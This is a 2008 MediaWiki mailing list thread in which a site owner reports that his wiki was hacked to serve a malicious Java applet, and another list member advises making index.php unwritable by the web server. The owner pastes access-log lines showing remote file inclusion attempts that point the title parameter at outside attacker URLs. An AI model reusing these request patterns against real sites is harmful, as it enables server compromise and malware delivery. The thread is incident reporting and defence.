Hi Itay,
Without delving into much detail - is there a way you can prevent the
index.php script from being modifiable by the web server process? I don't
know what platform you are running on, but if I understood you correctly it
was that script that got modified - and perhaps it never should be modified
over the web.
Cheers,
Boris.
On Fri, Mar 14, 2008 at 9:52 AM, Itay Ophir <itay(a)worldwideworkshop.org>
wrote:
Hi Everyone,
I hope this is the right place to ask about this (pls point me elsewhere
is
needed)
Our MediaWiki was hacked (twice in the past month) and someone was able to
change the root index.html files of our website and add an Iframe to it
that
loads a malicious java applet. If users select to run the applet it
installs
a virus/torjan on their PC.
After reading the log file I am thinking it's the Wiki's index.php page.
The
hosting is NetworkS' who said that I have a vulnerable php script. And I
should fix it.
This is from the log files:
XX.XX.XX.XX - - [29/Feb/2008:00:00:30 -0500] "GET
/wiki/index.php?title=Http://uuionmaniskis.rbcmail.ru/images%3F HTTP/1.1"
200 1688 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.1.4322)"
XX.XX.XX.XX - - [29/Feb/2008:00:00:29 -0500] "GET
/wiki/index.php?title=http://uuionmaniskis.rbcmail.ru/images? HTTP/1.1"
301
96 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.1.4322)"
XX.XX.XX.XX - - [29/Feb/2008:00:01:41 -0500] "GET
/wiki/index.php?title=http://uuionmaniskis.rbcmail.ru/images? HTTP/1.1"
301
96 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.1.4322)"
XX.XX.XX - - [29/Feb/2008:00:01:19 -0500] "GET
/wiki/index.php?title=http://sschhhoolsucksmmman.krovatka.su/images?
HTTP/1.1 <http://sschhhoolsucksmmman.krovatka.su/images?HTTP/1.1>" 301 96
"-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
.NET CLR 1.1.4322)"
XX.XX.XX.XX - - [29/Feb/2008:00:05:48 -0500] "GET
/wiki/index.php?title=Http://zaperyan1918moon.chat.ru/html/aboutme%3F
HTTP/1.1 <Http://zaperyan1918moon.chat.ru/html/aboutme%3FHTTP/1.1>" 200
1700 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
.NET CLR 1.1.4322)"
Can anyone advice on how to protect it/prevent future attacks?
Thanks a lot in advance!
Itay
_______________________________________________
MediaWiki-l mailing list
MediaWiki-l(a)lists.wikimedia.org
https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
--
Boris Epstein
http://www.dogandponny.org/
http://dikayasobaka.livejournal.com/ (Russian)